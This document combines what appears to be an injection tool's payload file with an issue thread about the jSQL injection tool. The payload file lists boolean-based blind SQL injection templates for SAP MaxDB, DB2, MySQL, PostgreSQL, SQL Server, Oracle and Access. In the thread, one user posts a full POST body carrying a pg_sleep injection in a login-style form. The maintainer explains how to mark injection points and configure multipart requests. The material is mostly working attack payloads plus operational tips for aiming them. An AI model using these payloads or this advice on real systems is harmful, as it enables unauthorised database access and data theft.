<title>SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause</title> 1 4 1 2,3 1 ,(CASE WHEN [INFERENCE] THEN 1 ELSE NULL END) ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END) ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END)

SAP MaxDB

<title>SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value)</title> 1 5 1 2,3 1 ,(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END) ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END) ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)

SAP MaxDB

<title>IBM DB2 boolean-based blind - ORDER BY clause</title> 1 4 1 3 1 ,(SELECT CASE WHEN [INFERENCE] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)

IBM DB2

<title>IBM DB2 boolean-based blind - ORDER BY clause (original value)</title> 1 5 1 3 1 ,(SELECT CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)

IBM DB2

<title>HAVING boolean-based blind - WHERE, GROUP BY clause</title> 1 3 1 1,2 1 HAVING [INFERENCE] HAVING [RANDNUM]=[RANDNUM] HAVING [RANDNUM]=[RANDNUM1] <title>MySQL >= 5.0 boolean-based blind - Stacked queries</title> 1 4 1 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) # ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)

MySQL >= 5.0

<title>MySQL < 5.0 boolean-based blind - Stacked queries</title> 1 5 1 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) # ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)

MySQL < 5.0

<title>PostgreSQL boolean-based blind - Stacked queries</title> 1 3 1 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) -- ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)

PostgreSQL

<title>PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES)</title> 1 5 1 1-8 1 ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1 ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1 -- ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1

PostgreSQL

<title>Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)</title> 1 3 1 1-8 1 ;IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] ;IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] -- ;IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]

Microsoft SQL Server Sybase

<title>Microsoft SQL Server/Sybase boolean-based blind - Stacked queries</title> 1 4 1 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END) ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END) -- ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)

Microsoft SQL Server Sybase

<title>Oracle boolean-based blind - Stacked queries</title> 1 4 1 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL -- ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL

Oracle

<title>Microsoft Access boolean-based blind - Stacked queries</title> 1 5 1 1-8 1 ;IIF([INFERENCE],1,1/0) ;IIF([RANDNUM]=[RANDNUM],1,1/0) %16 ;IIF([RANDNUM]=[RANDNUM1],1,1/0)

Microsoft Access

<title>SAP MaxDB boolean-based blind - Stacked queries</title> 1 5 1 1-8 1 ;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END ;SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END -- ;SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END

SAP MaxDB

[mrdragonblack]

can make jsql support in my case my injection they need parameter here the photo if not jsql can not detect the injection because this is in multipart in post thank you

[selectfromblackhydra]

like we have option to use costume parameter because my payload header is long
just add option to support parameter costume because many injection has have full post payload like this agama=6&agama=6&alamat_kantor=23456&jabatan=123456&jns_klmin=0&kode_reg=123456&nama=123456&nama_user=admin%27%2F%2A%2A%2Fand%28select%271%27from%2F%2A%2A%2Fpg_sleep%280%29%29%3A%3Atext%3E%270&npwp=123456&pangkat=122&pangkat=122&password=KpNTNrZm&pendidikan=10&pendidikan=10&pilih_unitkerja=36&pilih_unitkerja=36&pilih_unitkerja=36&pilih_unitkerja=36&pwd1=pwd1&telpon_kantor=admin&telpon_rumah=admin&tempat_lahir=123456&tgl_lahir=2025-02-23&unit_kerja=admin this is full payload parameter post

[ron190]

• @selectfromblackhydra I review the payloads you sent previously but no payload seems new, thanks anyway 👍

• @mrdragonblack multipart should work with proper settings, select method POST, also carefully set the boundary value and expand the textfield to correctly set the newline chars, also if needed set the star * where injection should work :

Request :
--boundary\nContent-Disposition: form-data; name="name"\n\n'*\n--boundary--

Header :
Content-Type: multipart/form-data;boundary=boundary

• @selectfromblackhydra either set the star * at param nama_user=-1'*, or move param nama_user at the end of params list, or check Preference option Injection > URL parameters > Inject every Request parameters. Also expand the textfield to manage params easily.